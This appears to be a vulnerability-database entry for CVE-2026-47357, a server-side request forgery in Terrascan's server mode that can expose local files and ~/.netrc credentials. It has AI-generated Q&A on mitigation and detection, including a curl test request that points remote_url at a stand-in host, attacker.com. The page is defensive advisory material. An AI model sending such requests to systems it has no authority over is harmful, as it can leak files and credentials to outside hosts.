CVE-2026-47357
Server-Side Request Forgery in Terrascan
Publication date: 2026-05-19
Last updated on: 2026-05-20
Assigner: Tenable Network Security, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| tenable | terrascan | to 1.18.3 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-610 | The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere. |
| CWE-73 | The product allows user input to control or influence paths or file names that are used in filesystem operations. |
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided context does not explicitly describe how the CVE-2026-47357 vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.
What immediate steps should I take to mitigate this vulnerability?
Terrascan versions v1.18.3 and prior are vulnerable and no patch will be released since the project was archived in August 2023.
To mitigate this vulnerability, you should stop running Terrascan in server mode, especially if it is bound to 0.0.0.0 with no authentication.
Consider removing or restricting access to the vulnerable endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) that accepts the remote_url parameter.
Implement network-level controls such as firewall rules to block untrusted external access to the Terrascan server.
Since no patch is available, migrating to alternative tools or scanning methods that do not expose this vulnerability is recommended.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability affects Terrascan running in server mode (terrascan server) versions v1.18.3 and prior, which bind to 0.0.0.0 with no authentication and accept POST requests to the remote directory scan endpoint.
To detect if your system is vulnerable, you can check if Terrascan server is running and listening on network interfaces without authentication.
You can use network scanning commands to identify if the Terrascan server is exposed:
- Use netstat or ss to check for Terrascan server listening ports (default or configured):
- netstat -tulnp | grep terrascan
- ss -tulnp | grep terrascan
You can also attempt to send a crafted POST request to the vulnerable endpoint to test if the server responds without authentication:
- curl -X POST http://<terrascan-server-ip>:<port>/v1/<iac>/<iacVersion>/<cloud>/remote/dir/scan -d '{"remote_url":"http://attacker.com/malicious","remote_type":"http"}' -H 'Content-Type: application/json' -v
If the server responds and processes the request, it indicates the vulnerability is present.
Note: Since Terrascan was archived and no patch will be released, consider disabling or isolating the server mode to mitigate risk.
Can you explain this vulnerability to me?
Terrascan versions 1.18.3 and earlier have a Server-Side Request Forgery (SSRF) vulnerability in the remote directory scan endpoint when running in server mode. An unauthenticated attacker can supply a malicious HTTP URL via the remote_url parameter, which is passed without validation to the hashicorp/go-getter library. This library supports a response header that allows redirection to local file URLs, enabling the attacker to read local files. Additionally, the library reads credentials from the user's ~/.netrc file and sends them to attacker-controlled hosts. This vulnerability affects Terrascan servers bound to all network interfaces without authentication.
How can this vulnerability impact me? :
This vulnerability can allow an attacker to read local files on the server running Terrascan, potentially exposing sensitive information. Furthermore, the attacker can obtain credentials stored in the ~/.netrc file and send them to malicious hosts, leading to credential theft. Since the server runs without authentication and listens on all interfaces, it is exposed to remote exploitation.